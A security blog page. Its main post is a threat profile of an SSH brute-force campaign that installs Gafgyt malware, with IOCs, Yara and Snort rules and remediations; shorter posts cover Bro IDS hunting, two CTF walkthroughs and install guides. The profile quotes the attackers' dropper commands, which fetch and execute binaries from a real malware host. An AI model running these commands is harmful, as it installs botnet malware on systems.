Introduction

I’ve been monitoring an interesting threat for the past several days, a group I’m referring to as “Killer Swag”. Mainly because the initial dropper is called “Swag.sh” and “Killer Swag” just sounds cool. In another life I think I would have been a marketing genius, but I digress. This post will cover my research into Killer Swag but won’t be as detailed as I would like. Most of my malware analysis is dynamic in my sandbox environment but sadly that network is down due to the sauna like atmosphere it creates in my office. So “you” being the poor reader will have to suffer through my poor static analysis skills. So let’s begin!

Summary

From what I’ve observed the groups focus seems to be SSH brute force attacks. The initially activity began on May 10, 2017 and continued for slightly over a week until stopping completely on May 19th. Activity then picked up on June 2nd and increased ten fold by Tue, June 6, 2017. Killer Swag uses various subnets to brute force the root login and once successful immediately disconnects. The login information is then used by the IP addresses 181.215.195.56 and 154.16.3.104 to log into the honeypot and run several Linux commands before downloading the “Swag.sh” dropper from IP 107.174.34.70. This Bash script is then executed which in turn sends more wget request back to 107.174.34.70 to download multiple copies of the Linux.Gafgyt malware family and await further instructions.

Behavior

As stated above once a successful login is achieved the brute forcing ceases. The next step involves a login from one of the two IP addresses which are both owned by HostPalace Web Solution PVT LTD and conveniently allocated to two separate hosting companies. After login from either IP, the Killer Swags Bash script runs the following commands.

cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /

It’s likely that the above commands are used to verify the existence of the Linux filesystem before allowing the dropper to be downloaded. Next a wget request is sent out for a single file which has been identified as a generic Linux.Downloader from the following URL hxxp://107.174.34.70/Swag.sh

Once downloaded the dropper runs the following commands:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/ntpd; chmod +x ntpd; ./ntpd; rm -rf ntpd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/sshd; chmod +x sshd; ./sshd; rm -rf sshd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/openssh; chmod +x openssh; ./openssh; rm -rf openssh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/bash; chmod +x bash; ./bash; rm -rf bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/tftp; chmod +x tftp; ./tftp; rm -rf tftp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/wget; chmod +x wget; ./wget; rm -rf wget
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/cron; chmod +x cron; ./cron; rm -rf cron
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/ftp; chmod +x ftp; ./ftp; rm -rf ftp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/pftp; chmod +x pftp; ./pftp; rm -rf pftp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/sh; chmod +x sh; ./sh; rm -rf sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/' '; chmod +x ' '; ./' '; rm -rf ' '
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/apache2; chmod +x apache2; ./apache2; rm -rf apache2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.174.34.70/telnetd; chmod +x telnetd; ./telnetd; rm -rf telnetd

Each of these requests downloads and installs the Linux.Gafgyt backdoor and waits for further instructions.

Infrastructure

Let’s begin our analysis by doing some OSINT on both the Attacker IP’s and the Malware Host. One of the first things I check with IP’s is DNS resolution using something like RiskIQ but in this case none of the IP address resolved to anything. I followed this up by doing full TCP & UDP port scans for both attacking IPs using NMap and Unicorn but SSH continued to be the only available service on those IPs.

Attacker IP 1:
154.16.3.104

Open Ports:
Full TCP + UDP Port Scans
22 Open (SSH-2.0-OpenSSH_5.3)

Network Summary
Inetnum: 154.16.3.0/24
Netname: Serverhosh-Internet-Service
Country: Netherlands

ASN: 133229
Organization: HostPalace Web Solution PVT LTD
Country: India

Attacker IP 2:
181.215.195.56

Open Ports:
Full TCP + UDP Port Scans
22 Open (SSH-2.0-OpenSSH_5.3)

Network Summary
Inetnum: 181.215/16
Owner: HOST1PLUS hosting services. Brazil.
Country: Brazil

ASN: 133229
Organization: HostPalace Web Solution PVT LTD
Country: India

Key Point: What’s interesting here is that both attacker IP’s although located in different countries have the same single uplink AS 133229 owned by HostPalace Web Solution PVT LTD.

Malware Hosting:
107.174.34.70

Open Ports:
22 (SSH-2.0-OpenSSH_5.3)
80 (Apache httpd 2.2.15)

Network Summary
Owner: ColoCrossing (VGS-9)
Country: United States (US)
IP Range: 107.174.32.0/21

ASN: 36352
Organization: ColoCrossing
Country: United States (US)

ColoCrossing has a handful of subnets at it’s disposal with it’s /21 and attackers will often times control multiple hosts under the same provider to make maintaining their infrastructure easier. With this in mind I decided to see if the payloads where being hosted on any other ColoCrossing machines. By combining the results of Censys.io and NMap I was able to find a total of 115 host with live web servers.

My next step was to feed the resulting URL list into wget to see if any of the IP’s were hosting the same payloads.

wget --wait=10 --user-agent="Apple-iPhone5C3/" --referer=https://goo.gl/5BHyiB --input-file=/home/zerg/url.txt

Pro Tip – When downloading malware directly from a host I always make sure to manipulate things such as the “user agent” string and the “referer”. This is twofold really. Changing the “user agent” string to appear as an actual browser or anything other than wget’s default is just a smart way to avoid any potential issues with the host blocking particular agent strings.

Changing the “referer” can potentially yield valuable information. I typically change the referer to either a URL shortner that I control or a unique URL such as jamesbower.com/U398Deq. The idea behind this is that if the attacker is monitoring access to the hosted payloads sees an interesting referer they may be more inclined to visit it thinking it links back to their host. Since the referer is unique and not shared, any access to it would most likely be coming from the attacker and could reveal details such as location, browser info and other potentially valuable intelligence.

None of the other webservers on ColoCrossing appeared to be hosting identical payloads at the time of this research.

Malware Analysis

I begin by downloading each malware through Tor to a temporary VPS I’ve setup to do some simple analysis. I check the file size initially.

Then I move on to the file types.

From the file types we can see that the malware is setup to focus on at least several different system architectures. Now it’s time to create some SHA256 hashes so we can dive a little deeper.
IMAGE***
With our SHA256 hashes we can begin querying Virus Total to get more insight into our malware.
IMAGE***
I went ahead and submitted the other SHA256 hashes as well but the results are almost all identical to what is shown in the image above. Although the detection ratio was anywhere from 21-24 the results all named the malware Linux.Gafgyt which is an extremely common botnet that has quite a few variants and seems to be growing in popularity when compromising I0T devices. This may be due to the number of features built into the malware and the low entry needed for up and coming Internet hoodlums to start using it effectively.

When researching variants of the botnet I found that quite of few of them were using DNS on 8.8.8.8 to keep track of victims as they become infected. My version however seemed to be trying to connect to Telnet on 107.174.34.70 instead. This is strange to me considering that port 23 is closed on the host. A possibility is that my analysis is simply incorrect or the attacker is in fact using port 23 and reviewing the firewall logs as a means of keeping track of victims.

MalwareMustDie did a great job of providing a technical review of a lot of these variants and their research gave me some really good insight and is definitely worth a read.

http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html

Below are some of the interesting strings I found in the ntpd file.
IMAGE***
Next I start deep diving into the ELF ntpd file using Radare2 and elf-parser. Putting these together we can gain a lot more information about this malware’s capabilities.
IMAGE***
Below is a good break down of the main functionality. One of the most interesting pieces contained in the malware are the hardcoded IP’s used the C2 communication.

Random Functions
rand()
random_r()
srand()
srandom_r()

Process Manipulation
fork()
kill()
raise()

Network Functions
connect()
gethostbyname()
gethostbyname_r()
inet_addr()
recv()
socket()

C2 IP Addresses
1.0.154.39
1.8.1.11
1.9.0.6
1.9.0.8
1.9.1.6
1.9.2.4
1.9.2.6
107.174.34.70
107.174.34.70:23
5.0.0.74

Information Gathering
getpagesize()

HTTP
User-Agent: %s

File Functions
fclose()
fopen()

Anti-Debug
Fake dynamic symbol table in sections

Network Analysis

When detonating the malware in a sandbox I’m able to get very little network information as the initial C2 has already been taken offline.
IMAGE***
But with the PCAP opened in Wireshark if we follow the TCP stream we’re able to confirm that the infected host try’s communicating via Telnet to 107.174.34.70 sending the data “PING”.
IMAGE***
Now is a good time to look into the hardcoded C2 IP addresses.

Detection

Below you’ll find a simple Yara rule to detect the generic Gafgyt botnet malware described above.

Yara Tactical:

rule Gafgyt_Generic_Botnet {
meta:
description = "Gafgyt Generic Botnet Malware Signature"
author = "James Bower"
reference = "Quantum Honeynet"
date = "2017/06/14"
super_rule = 1
hash0 = "2a18f2d59f172622e76d9d9b5c73393b"
hash1 = "06de2d19862494be7dbcbcf20b3dbe3a"
hash2 = "0fc30a802a07386f5cd4b18b47547979"
hash3 = "be6865ccb948f2937fd25fe465e434da"
hash4 = "c8d58acfe524a09d4df7ffbe4a43c429"
hash5 = "0f979b4ae1209020dd2b672f9dad7398"
hash6 = "45826c129bf3d3bd067e33cf7bef3883"
hash7 = "79b9d4cea7972951efad765406459f5e"
hash8 = "baad702930571c414b0e8896f8bb4a5f"
hash9 = "11754a20e705dccf96f1a1def7220efc"
hash10 = "67db9ed04d3b56f966a739fd40a47748"
strings:
$s0 = "busybox" fullword
$s1 = "PONG!" fullword
$s2 = "GETLOCALIP" fullword
$s3 = "HTTPFLOOD" fullword
$s4 = "LUCKYLILDUDE" fullword
$s5 = "/dev/null"
$s6 = "/etc/resolv.conf"
$s7 = "/etc/config/resolv.conf"
condition:
all of them
}

Snort Tactical:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Gafgyt_Generic_Botnet"; flow:established,to_server; content:"GET"; fast_pattern; http_uri; content:".sh"; distance:0; http_uri; content:"User-Agent|3a 20|Wget/"; http_header; content:!"Referer|3a|"; http_header; reference:url,jamesbower.com/threat-profile-killer-swag/; classtype:trojan-activity; sid:999999; rev:1;)

Remediations

Although the incident discussed above occurred on a honeypot, I believe it’s important to discuss simple remediations that could prevent this type of attack on production systems.

Password Complexity – Ensuring that your organization has put in place policies requiring at minimum a password complexity of at least eight character/alpha-numeric.

Fail2ban – Always a must on Linux/SSH systems. I generally have this set to a time out of 30-60 min after 5 failed login attempts.

SSH Keys – Getting away from using passwords and instead relying on SSH Keys can ease password management.

SSH Configuration – Disabling root login is still considered good practice for a reason.

IOC

IP Addresses:

181.215.195.56
154.16.3.104

Malware Hosting:

107.174.34.70

C2 IP Addresses:

1.0.154.39
1.8.1.11
1.9.0.6
1.9.0.8
1.9.1.6
1.9.2.4
1.9.2.6
5.0.0.74

MD5 Hashes

2a18f2d59f172622e76d9d9b5c73393b
06de2d19862494be7dbcbcf20b3dbe3a
0fc30a802a07386f5cd4b18b47547979
be6865ccb948f2937fd25fe465e434da
c8d58acfe524a09d4df7ffbe4a43c429
0f979b4ae1209020dd2b672f9dad7398
45826c129bf3d3bd067e33cf7bef3883
79b9d4cea7972951efad765406459f5e
5f79a5a8b841cd3510e968549120745c
baad702930571c414b0e8896f8bb4a5f
11754a20e705dccf96f1a1def7220efc
67db9ed04d3b56f966a739fd40a47748

SHA256 Hashes

61cfe4fc6946bbdab5704de099091f12f94939a5815e490c87e6055bd485ff15
754ad0f005a4ce0fccb97ec63e56774f4c458f442af3f7c4195ae946f9294fc0
dc1a34ef6083911b12c0169ab0542d0614154e4b9d8e835a56f889aafc365aca
53c09439bb515ac9e874696623e882f0f7c00eae72b38bbdc28b54ee2073429c
66dcffb21516fd74fa385b279457027e95be8d7d53af04ca52edcb4b2e8f13e4
d226f70d9a554de4b97adf333b666d791b964a26ef8d54229a078bc41f31539d
84ea0439e5bbc399d6ce53583dd24a75997378318783ceb6dc9b224e916119cc
78b34758c22b7a9d63652833f9111007ccabbdf32e52d6dd1fdf468220c700a1
1a5f7c961f62741341fcca0a1c0dd0d7bec7bab75ecff817cdb287a89662352c
af9c88b4d766fa0186d88d6c8dc57e6404088487842f76a1058c961c60ab8e89
754f56cc6911cfaa09389ad202fb0c2ac38e468ae280a03a13f171439817ff04
4993e8aa5a1b48a279fb989589fa771f45ed81e1c0ed9fe18dda9712455eb7fb

Bro IDS, Threat Hunting

Threat Hunting with Bro IDS

February 20, 2017 jbower

This post is a quick look at how I personally use Bro IDS for threat hunting. Specifically some of the queries I run when I start a hunt by data set. A quick note on Bro. Bro IDS is a pretty amazing piece of software for threat hunting and my go to tool of choice. Bro is essentially a protocol analyzer. Furthermore, simply feed it a PCAP file or live traffic and watch if parse out individual protocols such as SMTP, IRC, FTP, HTTP, and a million others in nice individual log files. When examining it’s log files you’ll see that Bro was able to turn that network traffic into useful metadata. And that “metadata” helps to provide us with context which is the key to finding potential threats quickly. A powerful feature to use when hunting is the “bro-cut” utility. Bro-cut saves me a ton of time when writing out my query strings. To get your feet wet with Bro check out the interactive Bro tutorial here: http://try.bro.org/#/?example=hello or if you just want to dive in head first like me then check out my post on installing the latest Bro release on Ubuntu 16 here:

How to Install Bro IDS 2.5 on Ubuntu 16.0x

Before showing you some of the queries here is a quick explanation of some of the Bro-cut options I find useful.

Useful Bro-cut Command Options:

-d convert the epoch time values in the log files to human-readable format.

-c to include a corresponding format header into the output, which allows to chain multiple bro-cut instances or perform further post-processing that evaluates the header information.

-u Converting the timestamp from a log file to UTC

DNS Log

cat dns.log | bro-cut query | sort -u

cat dns.log | bro-cut -d answers | sort -u

Here’s what typical response to “cat dns.log | bro-cut query | sort -u” would show. Clearly one of my clients has an unhealthy obsession with Toys“R“Us.

Bro-cut and sort on dns.log — “Bro-cut and Sort on dns.log” – Image 1

HTTP Log

bro-cut user_agent < http.log | sort -u

bro-cut mime_type < http.log | sort -u

cat http.log | bro-cut host | sort | uniq -c | sort -n | tail -n 10

cat http.log | bro-cut referrer | sort -u

SSL Log

cat ssl.log | bro-cut server_name, subject | sort -u

Connection Log

cat conn.log | bro-cut -d ts uid host uri

cat conn.log | bro-cut service resp_bytes id.resp_h | sort -u

cat conn.log | bro-cut service id.resp_p id.resp_h | awk '$1 == "http" && ! ($2 == 80 || $2 == 8080) { print $3 }' | sort -u

cat conn.log | bro-cut id.orig_h id.orig_p id.resp_h duration

cat conn.log | bro-cut uid resp_bytes | sort -nrk2 | head -5

cat conn.log | bro-cut service | sort | uniq -c | sort -n

“Bro-cut Connection Log Service Sort” – Image 4

That’s just a few to get anyone new to threat hunting with Bro started. If you have any questions or comments feel free to berate me at @jamesbower

CTF

SkyDog Con 2016 CTF – Walk Through Guide

October 23, 2016 jbower

Download Link
The VM is now available for download on Vulnhub at the link below.

https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/

Instructions
The CTF is a virtual machine and works best in Virtual Box. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file it is best to make sure that USB 2.0 is disabled before booting up the VM. The networking is setup as a Host-Only Adapter for networking but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Goal of Sky Dog Con CTF
The purpose of this CTF is to find all eight flags hidden throughout the server by hacking network/system services and applications. This can be achieved without hacking the VM file itself.

Flags
The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Walk Through

Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”

I begin by running a minimum port scan and find that only ports 80(HTTP) and 443(HTTPS) appear to be open.

Next I check out the web pages and see that they’re both the same webpage which is just the CTF homepage with details and instructions but no obvious flag.

Let’s see what my favorite old timer web scanner Nikto comes back with.

Nikto doesn’t provide me anything of real interest so I continue moving forward. I kick off Dirb to look for potentially sensitive directories but again I’m disappointed.

I use Burp Suite to spider the site and then do an active scan to look for some way of compromising either the site itself or the webserver itself.

Burp comes back showing the site has an LFI vulnerability but further analysis shows this is a false positive so no luck there. Out of habit I always love checking out a websites source code to see if anything interesting jumps out at me. Looking at the source code I notice a potentially interesting file at /oldIE/html5.js

When I look at the file I see an interesting sequence of numbers at the top.

These numbers look like hex! This has to be part of the flag just based on our clue. Now I convert the hex to text using the following xxd command.

[email protected]# echo 666c61677b37633031333230373061306566373164353432363633653964633166356465657d | xxd -r -p

And we’ve got our first flag.
flag{7c0132070a0ef71d542663e9dc1f5dee}

Since I know the flags are all MD5 hashes I decided to Google the hash just for the heck of it. So 7c0132070a0ef71d542663e9dc1f5dee = “nmap”. Hmm..

Flag#2 – “Obscurity or Security? That is the Question”

Ok so when I look at the clue I think of “Security Through Obscurity” which for me translates into security in plain site. That along with the “nmap” MD5 hash from the last flag makes me think I need to look deeper into my nmap scans.

Ok after running a more complete scan of all 65535 ports I see that the server is running an SSH server on port 22222. That must be my way into the server.

I try logging into the SSH server with a basic test/test account just for the lulz.

Awesome! We’ve got our second flag.

Flag{53c82eba31f6d416f331de9162ebe997}

Ok so now I know the importance of looking up the MD5 hashes for additional clues. So 53c82eba31f6d416f331de9162ebe997 = “encrypt”.

Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”

Alright so our hero Frank has “intercepted traffic” in the past and our additional clue is “encrypt”. The only thing that I’ve come accross so far having anything to do with intercepting traffic and encryption would be the SSL in use for the default site. So I take a closer look at the SSL cert and BOOM. There’s the third flag. flag{f82366a9ddc064585d54e3f78bde3221}.

And f82366a9ddc064585d54e3f78bde3221 = “personnel”

Flag#4 – “A Good Agent is Hard to Find”

So I’m not really sure what this clue is referencing. Looks like the only thing I have to go on is the previous clue word of “personnel”. Possibly a password or maybe a directory? Let’s find out.

Hmm. Ok so we know that /personnel is a directory but we don’t appear to have access from the message we get; “ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation.” FBI Workstation huh? How does the webserver know I’m not coming from a FED machine? IP address or referrer or maybe my user agent string? Too many assumptions. Let’s look at what I know so far. So far my only real artifacts have been the html5.js file and the SSL cert. I don’t see anything else out of the ordinary in the SSL cert so I go back and continue looking through the html5.js file for clues. There is a bunch of junk in this
file so I decide to just look at the comments first. And sure enough about half way through the file we come across some really interesting comments.

Turns out as of May 2016 the FBI still uses IE4 on all workstations per “[email protected]”. Can’t say this is too surprising but hey whatever floats your boat I guess. Ok so now I refresh the page with an IE4 user agent and we’re greeted with what looks to be an FBI Portal welcoming Agent Hanratty.

At the bottom of the portal we find our fourth flag{14e10d570047667f904261e6d08f520f} and a new clue “Clue = new+flag”.

And 14e10d570047667f904261e6d08f520f = “evidence”

Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”

With the information we just got from Flag#4 I’m going to guess that I should see if /newevidence is a directory. Yep, but it looks like I need a username/password in order to log in along with still using an IE4 user agent.

Ok so let me think about this. When I logged into the Portal I was greeted as Agent Hanratty. It’s a good bet that Agent Hanratty is the user I need to be in order to log in but what’s his username? First thing I need to do is figure out what naming scheme the FBI uses when creating new users. Well if I look back at my notes I can see that the FBI creates accounts using the scheme “firstname.lastname” which I saw from the “[email protected]” comment in the source code.

Since I’ve watched the movie already I know that Agent Hanratty’s first name is Carl so his username should be carl.hanratty if my naming scheme guess is correct. Now for his password. The clue for Flag#5 talks about dialogue and “Best Practices”. I’m pretty sure that “Simple, Guessable, Personal and Goes Against Best Practices” is referring to passwords. Now I’m thinking about movie dialog with Carl Hanratty. I’ve got two choices here really. Watch the movie again or download a transcript of the movie. I decide that watching the movie again with some popcorn and two Czech gymnast is the better call.

Thanks old man, who ironically can barely hold up his sword so how is he supposed to protect the cup? But I digress. I have chosen wisely but I’m also all business so I paid special attention to anything Tom Hanks character said that might be personal and something that might be used as a password. Bingo, in one of the scenes Agent Hanratty mentions that he has a daughter named “Grace”. I kick out my libidinous and limber business associates. Time for James to get paid. Let’s see if that works.

Yep, I’ve now got access to the /newevidence directory and it looks like there’s a few things in here. Ok cool, so Evidence.txt contains our flag. flag{117c240d49f54096413dd64280399ea9}

And 117c240d49f54096413dd64280399ea9 = “panam”

Ok so PanAm is the major airline that Frank defrauds in the movie. I add this to my notes just in case it’s needed later.

Flag#6 – “Where in the World is Frank?”

Ok so where is Frank? I’ve still go the two files “image.jpg” and “Invoice.pdf”. I download both files to my Kali box and now it’s time to take a deeper look. I’m going to see if the PDF file is hiding anything that might interest me.

[email protected]# pdf-parser Invoice.pdf

Nothing of value hiding inside the PDF except for where it was created but that’s a dead end. Now to look at the meta data for image.jpg. The only thing that pops out is the size. 4.1 MB for a JPEG seems rather large but not crazy large so this seems like another dead end.

Maybe I’m over thinking this. Let me look at the Invoice.pdf a little closer. So the invoice is for an “Encryption Consultation Project” from someone named Stefan Hetzl. A Google search for “stefan hetzl encryption” reveals that Stefan Hetzl is the author of Steghide. Steghide is a pretty awesome tool for using steganography and is built into Kali so that’s a pretty big clue. Then there is also the image itself. When I looked closely at it I could see sign on a building that said “le bellevue”. I Googled this and the results showed that it’s a place in France which is exactly where Frank ends up in the movie. But I still haven’t found the flag yet so deeper into the rabbit hole I go. I’m assuming that Steghide and image.jpg are linked now considering the size of the JPEG. Seems like a passphrase is needed to get pretty much any information out of Steghide. There’s a good chance that the passphrase is “panam” from our last MD5 hash. Ok very cool so the passphrase is “panam”.

Awesome so Steghide shows that there’s a file flag.txt embedded in the image. So now it’s time to extract it.

[email protected]# steghide extract -sf image.jpg

I’ve now got the flag.txt file in my current directory. And sure enough it contains our flag and a clue for Flag#7 “clue=iheartbrenda”. Onward and upward.

And d1e5146b171928731385eb7ea38c37b8 = “ILoveFrance”

Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”

Ok so this is a weird clue. Why is Frank yelling “I’m the fastest man alive!”? That just sounds strange to me but at the same time also kind of familiar. I Google the phrase and sure enough it’s from super hero Barry Allen; aka The Flash. Now this is interesting because in the movie when Agent Hanratty realizes that Frank is actually a kid it’s because one of Franks aliases is Barry Allen which is one of the names he used when cashing checks so that makes sense. Now I make a bunch of different combinations of “barry allen” and “the flash” and see if they correspond with any directories which is a big no. Ok so the only place left to use any credentials that I’ve found is SSH. So I try “barry.allen” with a password of “iheartbrenda” but that doesn’t work. Next I try “barryallen” and “iheartbrenda” as the password and I’m in.

Ok nice. In Barry’s home directory I’ve got the seventh flag which is flag{bd2f6a1d5242c962a05619c56fa47ba6} and I’ve got a pretty large file called “security-system.data”.

And bd2f6a1d5242c962a05619c56fa47ba6 = “theflash”

Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

Now that I have SSH access to the Barry Allen account I begin looking closer at the security-system.data file in the home directory. I download the file to Kali to see what type of file it is. The file command shows it’s a zip file so I run the following.

[email protected]# mv security-system.data security-system.data.zip

[email protected]# unzip security-system.data.zip

Now security-system.data show’s as simply data. Running strings on the file I see a lot of mentions of memory so I’m thinking its a memory image of a machine. The next step is to look at the file using volatility.

[email protected]# volatility -f security-system.data imageinfo

And sure enough volatility is able to show some interesting information. I continue to dig further using volatility.

[email protected]# volatility -f security-system.data --profile=WinXPSP2x86 iehistory

This is pretty intertesting. I can see a reference for a file called code.txt on the Desktop which is a direct reference to our clue.

I’m interested in seeing if I can view any screen shots from the image.

[email protected]# volatility -f security-system.data --profile=WinXPSP2x86 screenshot --dump-dir /root/Downloads/dump/

I was able to grab a few images but only one had anything visable which showed an empty code.txt but nothing else. My next step is to see if anything was typed into the console.

[email protected]# volatility -f security-system.data --profile=WinXPSP2x86 consoles

Awesome! I can see that code.txt was created on the Desktop by echoing hex into the file. Time to see what the hex says so I run the xxd command again.

[email protected]# echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d | xxd -r -p

And we get our final flag.

flag{841dd3db29b0fbbd89c7b5be768cdc81}

And 841dd3db29b0fbbd89c7b5be768cdc81 = “Twolittlemice”

Bro IDS

How to Install Bro IDS 2.5 on Ubuntu 16.0x

September 5, 2016 jbower

I decided to write out the steps I took to for installing Bro IDS 2.5 on Ubuntu 16.0x. Before we begin installing Bro from source we need to make sure we have all the correct dependencies.

On Ubuntu 16.0x you can run the following:

sudo apt-get install cmake make gcc g++ flex git bison libpcap-dev libssl-dev python-dev swig zlib1g-dev

Installing Notifications
In order to get notification emails from Bro we’ll install Sendmail

sudo apt-get install sendmail

Installing GeoIP
Having GeoIP on your Bro box is a great addition.

sudo apt-get install libgeoip-dev

sudo chown -R sniper:sniper /usr/share/GeoIP/

cd /usr/share/GeoIP/

mv GeoIP.dat GeoIP.dat.old

mv GeoIPv6.dat GeoIPv6.dat.old

wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz

wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCityv6-beta/GeoLiteCityv6.dat.gz

gunzip GeoLiteCity.dat.gz

gunzip GeoLiteCityv6.dat.gz

mv GeoLiteCity.dat GeoIPCity.dat

mv GeoLiteCityv6.dat GeoIPCityv6.dat

Installing IPSumDump

wget http://www.read.seas.harvard.edu/~kohler/ipsumdump/ipsumdump-1.85.tar.gz

gunzip ipsumdump-1.85.tar.gz

tar -xvf ipsumdump-1.85.tar

cd ipsumdump-1.85/

./configure

make

sudo make install

Installing GPerftools

sudo apt-get install libgoogle-perftools-dev

Installing PF_Ring

git clone https://github.com/ntop/PF_RING.git

cd PF_RING/kernel/

make && sudo make install

cd ../userland/lib

./configure --prefix=/opt/pfring

sudo make install

cd ../libpcap

./configure --prefix=/opt/pfring

sudo make install

cd ../tcpdump

./configure --prefix=/opt/pfring

sudo make install

sudo ldconfig

sudo modprobe pf_ring

To check if you have everything you need, enter:

modinfo pf_ring && cat /proc/net/pf_ring/info

Installing Bro from Source

git clone --recursive git://git.bro.org/bro

cd bro

./configure --with-pcap=/opt/pfring

make

sudo make install

Make sure that Bro is configured to use PF_Ring

ldd /usr/local/bro/bin/bro | grep pcap

Bro IDS Image 1 – Confirming Pfring Installation

Now adjust your PATH environment

export PATH=/usr/local/bro/bin:$PATH

echo 'export PATH=/usr/local/bro/bin:$PATH' >> ~/.bashrc

Now to test that GeoIP is working.

bro -e "print lookup_location(8.8.8.8);"

[country_code=US, region=CA, city=Mountain View, latitude=37.384499, longitude=-122.088097]

Configuring Bro
Next we need to configure Bro

The first step is letting Bro know which interface it needs to monitor.

sudo nano /usr/local/bro/etc/node.cfg

# Example BroControl node configuration.
#
# This example has a standalone node ready to go except for possibly changing
# the sniffing interface.

# This is a complete standalone configuration. Most likely you will
# only need to change the interface.
[bro]
type=standalone
host=localhost
interface=eth0

Running Broctl

broctl

(I got the below error message concerning permissions since I was running as a non-root user.)

Bro IDS Image 2 – Local User Permission Error

So I modified the permissions with “chown”.

sudo chown -R sniper:sniper /usr/local/bro/spool/

sudo chown -R sniper:sniper /usr/local/bro/logs/

sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bro/bin/bro

sudo setcap cap_net_raw,cap_net_admin=eip /usr/local/bro/bin/broctl

Now we just need to start Bro

broctl

[BroControl] >install
[BroControl] >status

And we’re in business.

CTF

SkyDog Con CTF – The Legend Begins

November 2, 2015 jbower Leave a comment

Sky Dog Con CTF – Over but not forgotten.

Download Link
http://bit.ly/SkyDogConCTF

Instructions
The CTF is a virtual machine and works best in Virtual Box. This OVA was created using Virtual Box 4.3.32. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above it is best to disable the USB 2.0 setting before booting up the VM. The networking is setup for a NAT Network but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Goal of Sky Dog Con CTF
The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

Flags
The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

Flag #2 When do Androids Learn to Walk?

Flag #3 Who Can You Trust?

Flag #4 Who Doesn’t Love a Good Cocktail Party?

Flag #5 Another Day at the Office

Flag #6 Little Black Box

Walkthrough

Flag #1 Home Sweet Home

Starting off we need to find the IP address of our booted VM. We can generally do this by either running an nmap ping scan or by running a nifty tool called “netdiscover”.

[email protected]:~# netdiscover 10.0.2.0/24

Sky Dog Con CTF - NetDiscover — Using Netdiscover for Host Discovery – Sky Dog Con CTF

Comparing the MAC address with the one given in our Virtual Box Settings we now know that the VM has an IP of 10.0.2.4.

Let’s find out what kind of services are running on it.

nmap -sV -P0 10.0.2.4

Ok so I’ve got a web server running Apache on Ubuntu along with an SSH server.

I’m going to dig a little deeper into the SSH server.

Nothing too revealing at the moment. Time to look into the webserver.

#PenTestProTip – Always make sure to keep notes while pentesting. The more detailed the better. Whether it’s an application, network, or even a mobile app I’m constantly creating “digital breadcrumbs” if you will in Evernote. This can also include things like screen shots, config files and other assets or whatever.

We already know that the server is running Apache so lets take a look.

Ok, so the homepage is basically just this SkyDog picture.

This reminds me that the first clue is “Home Sweet Home”. Maybe this is a reference to the homepage? I guess we’ll see.

The image seems pretty legit so let’s check out the source of the page.

Alright, the homepage is literally just the image.

#PenTestProTip – At this point most people will conclude that this is a dead end and move on. This happens in pen testing all the time. You begin to follow a lead and then give up right before the finish line. In my mind the image itself “SkyDogCon_CTF.jpg” is still an asset that needs to be analyzed.

I save the image to the desktop and do a quick check to see what’s up with it.

exiftool SkyDogCon_CTF.jpg

Great! We’ve got the first flag!

flag{abc40a2d4e023b42bd1ff04891549ae2}

But before moving on I want to know if this hash has any sort of significance or something. Let’s see what Google has to say.

Welcome Home! Very interesting. This goes in the notes.

Time for Flag #2

Flag #2 When do Androids Learn to Walk?

Uncategorized

Quick and Dirty: Installing Htop on FreeBSD 10.x

August 31, 2015 jbower Leave a comment

Htop is an interactive system-monitor process-viewer written for Linux. On most of my servers I have it up and running continually if I’m not actively on the box. It’s great to be able to quickly glance up and see the current state of a particular server or to see if something I’m running has gotten out of hand (I’m looking at you Bro). On FreeBSD 10.x the install is pretty straight forward with some minor tweaks.

Simply run the following commands:

$ sudo pkg install htop

Now create the proper folders:

mkdir -p /usr/compat/linux/proc

ln -s /usr/compat /compat

